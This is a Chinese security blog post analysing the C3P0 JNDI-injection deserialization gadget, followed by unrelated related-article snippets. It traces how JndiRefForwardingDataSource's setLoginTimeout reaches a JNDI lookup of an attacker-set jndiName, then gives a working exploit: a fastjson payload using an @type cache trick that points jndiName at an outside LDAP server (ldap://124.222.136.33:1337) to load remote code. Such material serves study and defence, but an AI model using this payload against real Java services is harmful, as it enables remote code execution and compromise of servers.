【Web】浅聊Java反序列化之C3P0——JNDI注入利用
目录
简介
原理分析
EXP
前文:【Web】浅聊Java反序列化之C3P0——URLClassLoader利用
【Web】浅聊Java反序列化之C3P0——不出网Hex字节码加载利用
简介
出网的情况下,这个C3P0的Gadget可以和fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等配合使用(调用setter和初始化方法)
和hex base的打法相比,这条链的利用对FJ反序列化触发的setter方法利用则更为直接
hex base好歹是有个setter设置属性+构造方法触发sink来进行攻击,jndi的利用干脆用setter把二者全包了
原理分析
就像上面说的一样,这个Gadget的核心主要是在setter上,因为过于简单粗暴,我们采用正向分析的方法去跟一下它
JndiRefForwardingDataSource#setloginTimeout
public void setLoginTimeout(int seconds) throws SQLException {this.inner().setLoginTimeout(seconds);}跟进this.inner()
private synchronized DataSource inner() throws SQLException {if (this.cachedInner != null) {return this.cachedInner;} else {DataSource out = this.dereference();if (this.isCaching()) {this.cachedInner = out;}return out;}}这段代码的作用是获取一个 DataSource 对象,在需要时从缓存中获取,如果没有缓存则创建新的对象,并在必要时将其缓存起来
跟进到this.dereference()
private DataSource dereference() throws SQLException {Object jndiName = this.getJndiName();Hashtable jndiEnv = this.getJndiEnv();try {InitialContext ctx;if (jndiEnv != null) {ctx = new InitialContext(jndiEnv);} else {ctx = new InitialContext();}if (jndiName instanceof String) {return (DataSource)ctx.lookup((String)jndiName);} else if (jndiName instanceof Name) {return (DataSource)ctx.lookup((Name)jndiName);} else {throw new SQLException("Could not find ConnectionPoolDataSource with JNDI name: " + jndiName);}}一眼经典JNDI,我们只要控制jndiName的值,就能实现jndi注入
jndiName来自this.getJndiName(),跟进一下
public Object getJndiName() {return this.jndiName instanceof Name ? ((Name)this.jndiName).clone() : this.jndiName;}很正常,就是获取该类的jndiName属性的值
那么有getter的地方必有setter,虽然JndiRefForwardingDataSource这个类本身没有setJndiName,但我们在其父类JndiRefDataSourceBase中找到了setJndiName
public void setJndiName(Object jndiName) throws PropertyVetoException {Object oldVal = this.jndiName;if (!this.eqOrBothNull(oldVal, jndiName)) {this.vcs.fireVetoableChange("jndiName", oldVal, jndiName);}this.jndiName = jndiName instanceof Name ? ((Name)jndiName).clone() : jndiName;if (!this.eqOrBothNull(oldVal, jndiName)) {this.pcs.firePropertyChange("jndiName", oldVal, jndiName);}}综合二者就可实现JNDI注入。
EXP
配合fastjson打JndiRefForwardingDataSource
package com.c3p0;import com.alibaba.fastjson.JSON;public class FJ {public static void main(String[] args) {String s="{ \"a\":{ \"@type\":\"java.lang.Class\", \"val\":\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\" }, \"b\":{ \"@type\":\"com.mchange.v2.c3p0.JndiRefForwardingDataSource\", \"jndiName\":\"ldap://124.222.136.33:1337/#suibian\", \"loginTimeout\":0 } }";Object object = JSON.parse(s);}
}
相关文章:
【Web】浅聊Java反序列化之C3P0——JNDI注入利用
目录 简介 原理分析 EXP 前文:【Web】浅聊Java反序列化之C3P0——URLClassLoader利用 【Web】浅聊Java反序列化之C3P0——不出网Hex字节码加载利用 简介 出网的情况下,这个C3P0的Gadget可以和fastjson,Snake YAML , JYAML,Yamlbeans , …...
Java项目:基于Springboot+vue实现的付费自习室系统设计与实现(源码+数据库+毕业论文)附含微信小程序端代码
一、项目简介 本项目是一套基于Springbootvue实现的付费自习室系统 包含:项目源码、数据库脚本等,该项目附带全部源码可作为毕设使用。 项目都经过严格调试,eclipse或者idea 确保可以运行! 该系统功能完善、界面美观、操作简单、…...
C++写食堂菜品管理系统
说明:本博文来自CSDN-问答板块,题主提问。 需要:学校拟开发一套食堂菜品管理系统,以便对菜品和同学们的评价进行管理,其中包含如下信息: 商户:商户名称、柜面位置、电话…… 菜品:菜品编号、菜品名称、价格、所属商户…… 学生:注册账号、昵称、电话…… 食堂里的商户…...
vue 在线预览word
1 mammoth 先找的是mammoth这个插件yarn add mammoth,版本是1,7.0 参考网上的示例使用如下: import mammoth from "mammoth"; const vHtml ref("") const readExcelFromRemoteFile (url) >{var xhr new XMLHttpRequest();xhr.open("…...
七彩虹八渐变 外贸建站公司wordpress模板
进出口水果wordpress外贸模板 漂亮水果wordpress外贸模板,做水果进出品生意的外贸公司自建站官网模板。 https://www.jianzhanpress.com/?p3516 玩具wordpress外贸模板 简洁玩具wordpress外贸模板,适合做跨境电商外贸公司使用的wordpres外贸s网站主题…...
[C++] C++生成随机数
一、简介 在C语言中常使用srand()random()的方式生成随机数,该方式并不是一个很好的随据说生成方法,一方面是因为其生成的随机数质量较低,另一方面其随机数范围也有所限制。在C11中推荐使用随机数引擎的方式生成随机数。 如何高效得生成高质…...
web开发——前端html、css、JavaScript学习总结(持续更新中.......)
目录模版 1 html:结构标签/属性文本标记: mark文本设置:删除线del / 下划线ins/ 加粗b / 强调的文本em / 重要的文本 strong超链接: a联系信息: addressdiv 定义文档中的分区或节: div行元素:spanhtml结构: main / section / articlenav表格:table html中各种标签/属性的英文扩…...
LeetCode 2044.统计按位或能得到最大值的子集数目
给你一个整数数组 nums ,请你找出 nums 子集 按位或 可能得到的 最大值 ,并返回按位或能得到最大值的 不同非空子集的数目 。 如果数组 a 可以由数组 b 删除一些元素(或不删除)得到,则认为数组 a 是数组 b 的一个 子集…...
Selenium自动化测试细节讲解
与以前瀑布式开发模式不同,现在软件测试人员具有使用自动化工具执行测试用例套件的优势,而以前,测试人员习惯于通过测试脚本执行来完成测试。 但自动化测试的目的不是完全摆脱手动测试,而是最大程度地减少手动运行的测试。自动化…...
强化学习工具箱(Matlab)
1、Get Started 1.1、MDP环境下训练强化学习智能体 MDP环境如下图 每个圆圈代表一个状态每个状态都有上或下的选择智能体从状态 1 开始智能体接收的奖励值为图中状态转移的值训练目标是最大化累计奖励 (1)创建 MDP 环境 创建一个具有 8 个状态和 2 …...
程序人生 - 爬虫者,教育也!
作为一个站长,你是不是对爬虫不胜其烦?爬虫天天来爬,速度又快,频率又高,服务器的大量资源被白白浪费。 看这篇文章的你有福了,我们今天一起来报复一下爬虫,直接把爬虫的服务器给干死机。 本文有…...
OKLink2月安全月报| 2起典型漏洞攻击案例分析
在本月初我们发布的2024年2月安全月报中提到,2月全网累计造成损失约1.03亿美元。其中钓鱼诈骗事件损失占比11.76%。 OKLink提醒大家,在参与Web3项目时,应当仔细调研项目的真实性、可靠性,提升对钓鱼网站和风险项目的甄别能力&…...
可视化表单流程编辑器为啥好用?
想要提升办公率、提高数据资源的利用率,可以采用可视化表单流程编辑器的优势特点,实现心中愿望。伴随着社会的进步和发展,提质增效的办公效果一直都是很多职场办公团队的发展需求,作为低代码技术平台服务商,流辰信息团…...
【代码】Android|获取存储权限并创建、存储文件
版本:Android 11及以上,gradle 7.0以上,Android SDK > 29 获取存储权限 获取存储权限参考:Android 11 外部存储权限适配指南及方案,这篇文章直接翻到最下面,用XXPermissions框架。它漏了这个框架的使用方…...
每日一练 | 华为认证真题练习Day196
1、在如图所示的网络中,三台交换机运行RSTP,配置情况如图所示 根据图中配置情况判断根交换机为 A. SWA B. SWB C. SWC D. 无法确定 2、如图所示,在RT1路由器上配置OSPF多进程,其中RT1的进程100通过骨干区域和RT2建立OSPF邻居&…...
如何在Linux本地搭建Tale网站并实现无公网ip远程访问
文章目录 前言1. Tale网站搭建1.1 检查本地环境1.2 部署Tale个人博客系统1.3 启动Tale服务1.4 访问博客地址 2. Linux安装Cpolar内网穿透3. 创建Tale博客公网地址4. 使用公网地址访问Tale 前言 今天给大家带来一款基于 Java 语言的轻量级博客开源项目——Tale,Tale…...
论哪个行业官网颜值普遍较高,装修设计第二,无人敢称第一。
装饰设计公司官网普遍颜值较高的原因主要包括以下几点: 1. 美学要求: 装饰设计公司本身就是从事美学和艺术的行业,他们对于视觉效果和美感有着较高的要求,因此他们的官网在设计上往往会更加注重颜值。 2. 品牌形象:…...
Elastic Stack--08--SpringData框架
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 SpringData[官网: https://spring.io/projects/spring-data](https://spring.io/projects/spring-data) Spring Data Elasticsearch 介绍 1.SpringData-…...
华为OD机试 - 模拟数据序列化传输(Java JS Python C C++)
题目描述 模拟一套简化的序列化传输方式,请实现下面的数据编码与解码过程 编码前数据格式为 [位置,类型,值],多个数据的时候用逗号分隔,位置仅支持数字,不考虑重复等场景;类型仅支持:Integer / String / Compose(Compose的数据类型表示该存储的数据也需要编码)编码后数…...
使用Tokeniser估算GPT和LLM服务的查询成本
将LLM集成到项目所花费的成本主要是我们通过API获取LLM返回结果的成本,而这些成本通常是根据处理的令牌数量计算的。我们如何预估我们的令牌数量呢?Tokeniser包可以有效地计算文本输入中的令牌来估算这些成本。本文将介绍如何使用Tokeniser有效地预测和管…...
3大场景全解析:macOS专业录屏工具QuickRecorder实战指南
3大场景全解析:macOS专业录屏工具QuickRecorder实战指南 【免费下载链接】QuickRecorder A lightweight screen recorder based on ScreenCapture Kit for macOS / 基于 ScreenCapture Kit 的轻量化多功能 macOS 录屏工具 项目地址: https://gitcode.com/GitHub_T…...
从理论到实践:NMPC轨迹跟踪控制器的非线性优化与Simulink仿真验证
1. NMPC与MPC的核心差异:为什么非线性问题需要特殊处理? 我第一次接触NMPC(非线性模型预测控制)时,最困惑的问题是:既然MPC已经能解决大多数控制问题,为什么还要大费周章处理非线性版本…...
BUUCTF-BUU BURP COURSE
打开页面后提示我们只能本地访问(127.0.0.1)构造伪造ip头发现x-real-ip可行需要登录但账号密码已经给了在源代码中找到密码构造POST请求体usernameadmin&passwordwwoj2wio2jw93ey43eiuwdjnewkndjlwe成功登录找到flag...
从零开始:为什么说AppFlowy是下一代AI协作空间的终极选择?
从零开始:为什么说AppFlowy是下一代AI协作空间的终极选择? 【免费下载链接】AppFlowy Bring projects, wikis, and teams together with AI. AppFlowy is the AI collaborative workspace where you achieve more without losing control of your data. …...
Flut Renamer终极指南:3分钟掌握跨平台批量文件重命名技巧
Flut Renamer终极指南:3分钟掌握跨平台批量文件重命名技巧 【免费下载链接】renamer Flut Renamer - A bulk file renamer written in flutter (dart). Available on Linux, Windows, Android, iOS and macOS. 项目地址: https://gitcode.com/gh_mirrors/ren/rena…...
中小企业福音:Qwen3-14B私有化部署全流程,轻松搞定智能客服与文档处理
中小企业福音:Qwen3-14B私有化部署全流程,轻松搞定智能客服与文档处理 1. 为什么选择Qwen3-14B 对于中小企业来说,部署AI模型往往面临两难选择:公有云API担心数据安全,自研模型又缺乏技术实力。Qwen3-14B正好填补了这…...
番茄小说下载器高效使用全攻略:轻松获取并管理你喜爱的小说
番茄小说下载器高效使用全攻略:轻松获取并管理你喜爱的小说 【免费下载链接】fanqienovel-downloader 下载番茄小说 项目地址: https://gitcode.com/gh_mirrors/fa/fanqienovel-downloader 在数字阅读时代,拥有一款可靠的小说下载工具能极大提升阅…...
7步效率革命:设计批量处理驱动的智能工作流
7步效率革命:设计批量处理驱动的智能工作流 【免费下载链接】illustrator-scripts Adobe Illustrator scripts 项目地址: https://gitcode.com/gh_mirrors/il/illustrator-scripts 副标题:告别重复劳动的设计自动化方案 在现代设计工作流中&…...
4个突破性步骤:Cellpose-SAM细胞图像分析完全指南
4个突破性步骤:Cellpose-SAM细胞图像分析完全指南 【免费下载链接】cellpose a generalist algorithm for cellular segmentation with human-in-the-loop capabilities 项目地址: https://gitcode.com/gh_mirrors/ce/cellpose 在生物医学研究中,…...
Spring AI 快速入门教程:基于VUE3与Spring AI技术实现的“流式聊天““打字机效果“功能
目录 前言 一、Spring AI 核心认知 1.1 技术定位与核心价值 1.2 版本支持与生态兼容性 1.3 与其他 AI 集成框架对比 二、效果展示 三、快速入门 3.1 环境准备 JDK 配置 AI 服务密钥准备 3.2 后端项目创建 主要技术栈 pom.xml 配置 application.yml 配置 Java 主…...